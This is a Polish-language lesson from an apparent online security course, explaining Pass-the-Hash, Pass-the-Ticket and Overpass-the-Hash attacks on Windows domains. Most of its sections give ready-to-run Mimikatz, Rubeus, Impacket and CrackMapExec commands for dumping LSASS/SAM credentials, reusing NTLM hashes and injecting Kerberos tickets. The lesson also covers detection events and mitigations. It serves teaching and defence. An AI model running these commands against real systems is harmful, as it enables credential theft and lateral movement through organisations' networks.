Cyber Security Academy · Lekcja

Ataki Pass-the-Hash i Pass-the-Ticket

Wykorzystają Państwo hashe danych uwierzytelniających i bilety Kerberos do poruszania się po sieci bez znajomości haseł w postaci jawnej.

Lekcja 2 z 413 kroki

Ataki Pass-the-Hash i Pass-the-Ticket to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 2 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Dlaczego te ataki są możliwe

Protokoły poświadczeń systemu Windows przechowują sekrety uwierzytelniania (skróty NTLM i bilety Kerberos) w pamięci. Napastnik z uprawnieniami SYSTEM może wyodrębnić te sekrety i ponownie ich użyć, aby uwierzytelnić się jako inni użytkownicy bez znajomości haseł.

Wyodrębnianie skrótów NTLM za pomocą Mimikatz

Mimikatz to najważniejsze narzędzie do wyodrębniania poświadczeń w systemie Windows. Uruchomione jako SYSTEM lub Administrator odczytuje pamięć procesu LSASS, aby wyodrębnić skróty NTLM i poświadczenia w postaci jawnej.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Pass-the-Hash (PtH) za pomocą Mimikatz

PtH wstrzykuje skrót NTLM do nowej sesji bez znajomości hasła w postaci jawnej. Skrót uwierzytelnia użytkownika w zdalnych usługach za pomocą NTLM, co skutecznie umożliwia poruszanie się poprzeczne do innych hostów systemu Windows.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Pass-the-Hash za pomocą Impacket

Impacket udostępnia narzędzia Pythona do ataków PtH: psexec.py, smbexec.py i wmiexec.py bezpośrednio przyjmują skróty NTLM w celu zdalnego wykonywania poleceń.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Wyodrębnianie biletów Kerberos

Bilety Kerberos również są przechowywane w pamięci LSASS. Mimikatz je wyodrębnia, a Rubeus to wyspecjalizowane narzędzie do obsługi biletów Kerberos w systemie Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Pass-the-Ticket (PtT)

PtT wstrzykuje skradziony bilet Kerberos do bieżącej sesji. Bilet uwierzytelnia użytkownika w usługach jako jego pierwotnego właściciela — nie jest potrzebny ani skrót, ani hasło.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Zdalne zrzucanie pamięci LSASS

Mając przyczółek, można zdalnie zrzucić pamięć LSASS za pomocą CrackMapExec lub secretsdump z Impacket — interaktywna sesja na celu nie jest potrzebna.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Ścieżki poruszania się poprzecznego

Po uzyskaniu skrótów lub biletów można poruszać się poprzecznie: użyć PtH na innych komputerach dzięki ponownemu wykorzystaniu lokalnych kont administratora, użyć PtT do uzyskania dostępu do usług domenowych oraz eskalować uprawnienia w kierunku administratora domeny, atakując uprzywilejowane konta.

Wykrywanie PtH i PtT

Obrońcy wykrywają PtH na podstawie: zdarzenia o identyfikatorze 4624 (logowanie) z typem logowania 3 i bez odpowiadającego mu logowania interaktywnego, anomalii w uwierzytelnianiu NTLM oraz sygnatur Mimikatz w pamięci lub na dysku.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Mechanizmy przeciwdziałania

Najważniejsze mechanizmy przeciwdziałania to: włączenie Credential Guard (chroni LSASS za pomocą wirtualizacji), ograniczenie ponownego używania lokalnych kont administratora na różnych komputerach (LAPS), wymuszenie grupy Protected Users dla uprzywilejowanych kont oraz wyłączenie NTLM wszędzie, gdzie to możliwe.

Overpass-the-Hash

Overpass-the-Hash przekształca skrót NTLM w TGT Kerberos. Jest to przydatne w środowiskach, w których NTLM jest zablokowany, ale dostępny jest Kerberos, lub gdy potrzebny jest TGT do dalszych ataków na Kerberos.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Szybkie sprawdzenie

Jaka funkcja zabezpieczeń systemu Windows chroni magazyn poświadczeń LSASS za pomocą wirtualizacji?

Podsumowanie: PtH i PtT

Pass-the-Hash i Pass-the-Ticket stanowią podstawę poruszania się poprzecznego w Active Directory. Oba ataki wykorzystują buforowanie poświadczeń systemu Windows w LSASS. Mimikatz i Impacket znacznie ułatwiają ich wyodrębnianie i ponowne użycie. Należy stosować Credential Guard, LAPS i grupę Protected Users oraz ściśle monitorować zdarzenia uwierzytelniania NTLM i Kerberos.

Bezpłatny start

Ucz się Cyber Security Academy dzięki korepetycjom AI — za darmo

Pisz i uruchamiaj kod w przeglądarce, otrzymuj natychmiastową pomoc od korepetytora AI dostępnego 24/7 i kontynuuj naukę w sieci lub w aplikacji.

Kursy
76
Lekcje
303

Często zadawane pytania

Czy lekcja „Ataki Pass-the-Hash i Pass-the-Ticket” jest bezpłatna?

Tak — pełny tekst „Ataki Pass-the-Hash i Pass-the-Ticket” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Ataki Pass-the-Hash i Pass-the-Ticket”?

Wykorzystają Państwo hashe danych uwierzytelniających i bilety Kerberos do poruszania się po sieci bez znajomości haseł w postaci jawnej. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 2 z 4.

Ile czasu zajmuje lekcja „Ataki Pass-the-Hash i Pass-the-Ticket”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Uwierzytelnianie Windows: NTLM i Kerberos
  2. Ataki Pass-the-Hash i Pass-the-Ticket
  3. Kerberoasting i AS-REP Roasting
  4. Hartowanie Active Directory
← Powrót do Cyber Security Academy